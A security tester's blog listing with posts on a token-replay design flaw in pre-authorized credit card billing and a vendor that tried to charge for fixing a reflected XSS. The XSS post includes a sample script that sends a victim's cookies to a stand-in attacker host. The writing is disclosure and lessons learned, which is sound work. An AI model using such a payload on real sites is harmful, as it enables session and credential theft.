Upon hearing about some of the new features in iOS 10, I decided to check it out using the Apple Beta Software Program. There are many new features ripe for the testing, but one particular feature caught my eye: rich links in iMessages. Essentially, when you receive a URL in an iMessage, your iPhone will attempt to retrieve the website to give you a little preview.
Today, we will be taking a look at another reason to perform a web application penetration test: building a business case for upgrading end-of-life or legacy software. The company I worked for at the time needed to manage its telephone number inventory while maintaining legislative compliance. It was time to update the in-place solution, as it was slow, outdated, and had some very specific requirements that made it hard to work with, but no one wanted to foot the bill for the update. Continue reading “XSS Doesn’t Live Here Anymore”
Today’s post does not involve vendor-shaming! It does, however, involve credit cards, design mistakes, and the potential to rip off customers. We were implementing pre-authorized credit card billing, and in a typical fashion, the project brought us on late in the game.
To understand the issue at hand, you’ll have to understand the proposed solution. There were three systems involved: the Customer Information system (CI), the Bill Management system (BM), and the Payment Vendor system (PV). The PV is responsible for storing credit cards securely; each stored card is referenced by a token, and the PV also handles the actual payment tasks, like charging the credit card. The CI is responsible for storing the customer’s details, including the aforementioned token. The BM stores information like how much a customer pays each month and their billing date. On the billing date, the BM grabs the token from the CI and submits it, along with the bill total, to the PV.
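The billing-date flow described above can be sketched roughly like this (all class and method names here are illustrative, not the actual systems’ APIs):

```python
from dataclasses import dataclass, field


@dataclass
class CustomerInformation:
    """CI sketch: stores customer details, including the PV token."""
    tokens: dict = field(default_factory=dict)  # customer_id -> token

    def get_token(self, customer_id):
        return self.tokens[customer_id]


@dataclass
class PaymentVendor:
    """PV sketch: holds the real card data; charges by token."""
    charges: list = field(default_factory=list)

    def charge(self, token, amount):
        self.charges.append((token, amount))
        return True


class BillManagement:
    """BM sketch: knows the bill amount and date; never sees the card itself."""
    def __init__(self, ci, pv):
        self.ci, self.pv = ci, pv

    def run_billing(self, customer_id, amount):
        token = self.ci.get_token(customer_id)  # 1. grab the token from the CI
        return self.pv.charge(token, amount)    # 2. submit token + total to the PV
```

Note that in this flow the BM only ever handles an opaque token; the card number itself stays inside the PV.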
Now, this solution looks okay on paper. The problem arises when you see how the token initially got from the PV to the CI. When a customer wanted to register for pre-authorized billing, they had two options: 1) do it through the online self-serve portal, or 2) call in to an agent. The agent used a desktop application, which did a fair job of automating the process. Essentially, the agent just had to enter the credit card information into the application. The application would then make the necessary calls to the PV to save the credit card and get a token, and then make the call to the CI to save the token to the customer’s account.
The problem with this flow was that the agent not only had visibility into the customer’s token, which could be used to charge money to their credit card, but also had permission in the CI to arbitrarily write tokens to accounts! This means that if an agent added a token to one account, they could just as easily repeat the call to the CI to add the same token to anyone else’s account. Effectively, one customer could end up paying multiple customers’ bills!
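The replay is easy to see in a toy sketch of the flow (class and method names are invented; the point is that the CI write call never checks which customer the token was issued for):

```python
class PaymentVendor:
    """Toy PV: stores card numbers and hands back opaque tokens."""
    def __init__(self):
        self._cards = {}

    def tokenize(self, card_number):
        token = f"tok_{len(self._cards)}"
        self._cards[token] = card_number
        return token


class CustomerInformation:
    """Toy CI: the write call does NOT verify that the token belongs
    to the customer it is being attached to -- that is the flaw."""
    def __init__(self):
        self.tokens = {}

    def write_token(self, customer_id, token):
        self.tokens[customer_id] = token


pv = PaymentVendor()
ci = CustomerInformation()

# The agent registers customer A's card normally...
token = pv.tokenize("4111 1111 1111 1111")
ci.write_token("customer_a", token)

# ...then simply replays the same CI write against another account.
ci.write_token("customer_b", token)
# Customer A's card now pays customer B's bills.
```

Nothing in this design binds a token to the account it was created for, so any agent with CI write access can attach anyone’s token to any account.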
Now, if the project team had involved us earlier, perhaps in the design phase, we may have caught this issue before it was written into the application. We could have advised the project that this would be the perfect use case for an intermediary service, one that would handle the calls to the PV and the CI behind the curtain, hiding the inner workings from the agents. Unfortunately, we were brought on late and so the project had to take on additional work and redo completed work, as customer security is priority #1.
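The intermediary service we would have proposed might look something like this sketch (names hypothetical): the agent calls a single enrollment endpoint, the token handling happens server-side, and only the service itself holds CI write permission.

```python
class PaymentVendor:
    """Minimal stub of the PV's tokenization call."""
    def __init__(self):
        self._cards = {}

    def tokenize(self, card_number):
        token = f"tok_{len(self._cards)}"
        self._cards[token] = card_number
        return token


class CustomerInformation:
    """Minimal stub of the CI's token store."""
    def __init__(self):
        self.tokens = {}

    def write_token(self, customer_id, token):
        self.tokens[customer_id] = token


class EnrollmentService:
    """The intermediary: agents call enroll() and get back only a
    confirmation. The token never crosses the agent's desk, and the
    agent no longer needs any direct CI write permission."""
    def __init__(self, pv, ci):
        self._pv, self._ci = pv, ci

    def enroll(self, customer_id, card_number):
        token = self._pv.tokenize(card_number)      # done behind the curtain
        self._ci.write_token(customer_id, token)    # only this service writes to CI
        return {"status": "enrolled", "customer": customer_id}  # no token exposed
```

With the PV and CI calls hidden behind the service, the token-replay abuse described above simply has no entry point from the agent’s side.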
The morals of the story: 1) Not all vulnerabilities are code issues; it helps to step back and look at the design. 2) Involve your testing team early, not just in the development/implementation phase but also in the design phase, as it can save you from having to start over later.
In keeping with the vendor theme, this next story is about a company that we will call Fortune-Teller (FT). FT has software in every device you own, whether you use Apple iOS/OSX, Android phones, Windows PCs, Linux, etc. They are everywhere, and the guy who started the company looks like he could be the villain in the next Die Hard movie. I am not sure if there is a moral to this story, or if I am just sharing it so people can start to see how “these things go”, as they say. In either case, let’s get started. Continue reading “Stop! Vendor Time!”
Today’s post tells a tale similar to the last one, in that it deals with vendors and the issues found in their software.
The vendor in this story (“The Vendor”) sells a provisioning platform that allows systems that need to provision services (like Order Management, Order Entry, etc.) to communicate with engineering systems through a more standardized API. The need arises partly from the fact that most engineering systems (phone switches, DACs, CMTS systems, etc.) use uncommon or low-level methods of communication to provision services and equipment, which are not easy to implement in a high-level system like a web application. The Vendor solves this by allowing other applications to send HTTP requests, which it then translates into the various messages and protocols that the downstream systems understand. There is much more to it than that, but that is the simple explanation. The Vendor has their solution in over 500 companies globally, including many major ISPs, telecom companies, and the US government.
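The translation idea can be pictured with a toy sketch like the one below. The device types and command formats here are entirely invented for illustration; real switch and CMTS provisioning protocols are far more involved.

```python
# Toy sketch of the HTTP-to-device translation layer described above.
# A standardized provisioning request (the kind an Order Management
# system might POST) is turned into a device-specific command string.

def translate(request):
    """Translate a standardized provisioning request into the
    low-level command a given device type understands."""
    device = request["device_type"]
    if device == "dslam":
        # Invented TL1-flavoured command format.
        return f"SET-PORT::{request['port']}:PROFILE={request['profile']};"
    if device == "cmts":
        # Invented CLI-flavoured command format.
        return f"cable modem {request['mac']} service-class {request['profile']}"
    raise ValueError(f"unsupported device type: {device}")
```

The upstream web applications only ever speak the standardized request format; the platform owns the per-device ugliness.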
This story takes place some time in mid-2014. The company I worked for was installing a new instance of The Vendor’s solution and wanted our team to perform some testing on it. As we started testing, we were quickly finding issues all over the place. Reflected XSS on the login page, unvalidated redirects allowing for phishing attempts, virtually no logging capabilities or account lockouts, and more. So, as we always do, we informed the project team and the vendor.
In my experience (and sadly so), the response from vendors when reporting a vulnerability is more often than not a negative one. It seems to be a common theme, which is really too bad. In a perfect world vendors would welcome external security testing, as it helps them offer their customers the most secure software they can. The more eyes looking for problems, the more likely the problems will be found. In this case, the vendor pushed back above and beyond the average.
The issue with the highest risk (and the first issue found) was the XSS, and so I will focus on that in this post. At first, The Vendor denied the issue. This is the common first stage in the bug-grief process. As demonstrated in my previous post, there are a number of methods that can be used to work through this stage: try different verbiage, describe the issue from a different point of view, explain the business or technical impacts, or give a real-life demonstration. The Vendor wouldn’t move out of the denial stage without a fight, and so we had to build a demonstration.
Our initial demo involved inserting an image of the Power Rangers onto the login page. While an awesome demo in theory, the non-‘evil-minded’ developers at The Vendor did not see the risk. “Who cares if you can put images on the login page?” was the reply we received, despite our explaining that the injection point is the same whether it loads an image or runs a cookie-stealing script. Back to the drawing board.
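The point we were trying to make is that the two demos differ only in payload, not in vulnerability. A sketch of the idea (the URL and parameter name are hypothetical; the real ones are withheld):

```python
from urllib.parse import quote

# Hypothetical vulnerable page and parameter; purely illustrative.
base = "https://provisioning.example.com/login?error="

# The "harmless" demo: the reflected parameter renders an image.
img_payload = '<img src="https://attacker.example.com/rangers.png">'

# The same injection point carrying script instead of markup:
# same flaw, very different impact. Payload shown for illustration only.
script_payload = (
    '<script>new Image().src='
    '"https://attacker.example.com/c?"+document.cookie</script>'
)

img_url = base + quote(img_payload)
script_url = base + quote(script_payload)
```

An attacker sends the second URL in a phishing email; the victim sees the real login page, while their session cookie quietly leaves the building.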
So we built a full-featured demo: the same injection point, but now running a script that captured credentials entered into the login form. We brought this demo back to The Vendor’s developers, walked them through the login process, and showed them the stolen credentials. After playing around a bit themselves, we finally had acceptance of the issue. For most, the logical thing to do would be to fix the issue that we all agree 1) exists, and 2) is a risk. In The Vendor’s case, the ‘logical’ thing to do was to write up a level-of-effort (LoE) & quote, effectively offering to ‘sell’ the fix to us.
This is the opposite of what a vendor should do. If a customer finds a security vulnerability in your software, do not attempt to charge them for a fix. You should instead fix the issue and thank your customer for assisting you in developing a better product for all your other customers.
In the end, we found other ways to mitigate the risk, but this shouldn’t have been necessary. The moral of the story: don’t rely on a vendor to provide a fix, even if they understand the issue and the risk. Sometimes you need to find a way to mitigate the risk on your own.
Note: Seeing as I intentionally withheld the vendor’s name, please do not guess it in the comments section below. Also of note: Eventually, the vendor did publish a fix, but as always it is up to the customer to stay up to date on patches. Please make sure you patch often!
Two years ago, we discovered an issue in a certain vendor’s software (one that has since been fixed). For legal reasons, I cannot disclose the name of the vendor, so let’s just call them The Vendor. The Vendor provides an out-of-the-box Back Office solution to telecom companies across the world and is one of the “industry standards” in their space.